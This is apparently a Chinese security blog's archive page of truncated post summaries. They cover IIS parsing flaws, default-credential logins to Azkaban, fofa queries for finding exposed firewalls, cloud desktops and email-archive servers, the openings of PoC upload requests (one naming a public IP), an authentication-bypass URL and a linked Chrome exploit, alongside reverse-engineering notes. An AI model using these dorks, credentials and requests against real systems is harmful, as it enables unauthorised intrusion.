04 2021 档案
摘要:目标和学习计划: 1.学会安装IDEA 2.学会用IDEA写java程序 3.学会把Java程序打包出来 4.学会怎么使用打包出来的java包 5.学会IDEA简单搭建spring 6.学会复现spring框架漏洞 一、下载安装 官网:https://www.jetbrains.com/idea/
阅读全文
摘要:1.文件解析漏洞 1.asp;.jpg 1.asp;.zip >解析成asp 2.目录解析漏洞 *.asp/目录下的所有文件解析成asp 3.iis6 文件上传漏洞 条件:1.开启webDAV 2.开启来宾写入修改权限 扫描是否存在漏洞: 利用上传脚本iiswrite.exe上传txt再mov 修改
阅读全文
摘要:1.用goby扫描发现目标主机开发8081端口 2.访问 3.上网搜索azkaban 默认密码 (常见的管理员用户和密码) root root admin admin azkaban azkaban …… 果不其然 azkaban azkaban登陆上去了 4.接着打算找上传点或者命令执行点 百度找
阅读全文
摘要:fofa: app="网康科技-下一代防火墙" poc: POST /directdata/direct/router HTTP/1.1 Host: 119.62.56.24:444 Connection: close Cache-Control: max-age=0 sec-ch-ua: "Goo
阅读全文
摘要:fofa: body="和信下一代云桌面" 构造发送数据包: POST /Upload/upload_file.php?l=test HTTP/1.1 Host:x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
阅读全文
摘要:利用条件 关闭浏览器(chrome、edge等)沙盒 环境: win7/win10 chrome 89.0.4389.82(x64) 内存好像要够大:8/16g poc:https://github.com/r4j0x00/exploits/tree/master/chrome-exploit po
阅读全文
摘要:fofa: title="MessageSolution Enterprise Email Archiving (EEA)" 访问后: exp: https://ip/authenticationserverservlet/ 直接登陆就可以了
阅读全文
摘要:这个程序的源代码为调用一个加法函数,打印main用来定位主函数入口,目的是分析一个函数在调用的过程中汇编中的代码是怎么样的 打开反汇编,寻找到主函数; call 调用一个函数的过程是:push eip 先保存当前的eip指令指针,然后jum到函数的地址 下面这里是按F7进入到函数里面 一个函数的调用
阅读全文
摘要:exe源码: #include <stdio.h> int main() { printf("test_ok!"); return 0; } 1.点击文件打开需要逆向的exe文件 2.寻址到main入口:ctrl+G 输入main跟随定位到main入口 3.这里的意思是把一个字符串的地址中的字符串p
阅读全文
摘要:基本结构图: ms-dos头 (注:最左边是文件头的偏移量。) IMAGE_DOS_HEADER STRUCT { +0h WORD e_magic // Magic DOS signature MZ(4Dh 5Ah) DOS可执行文件标记 +2h WORD e_cblp // Bytes on l
阅读全文
浙公网安备 33010602011771号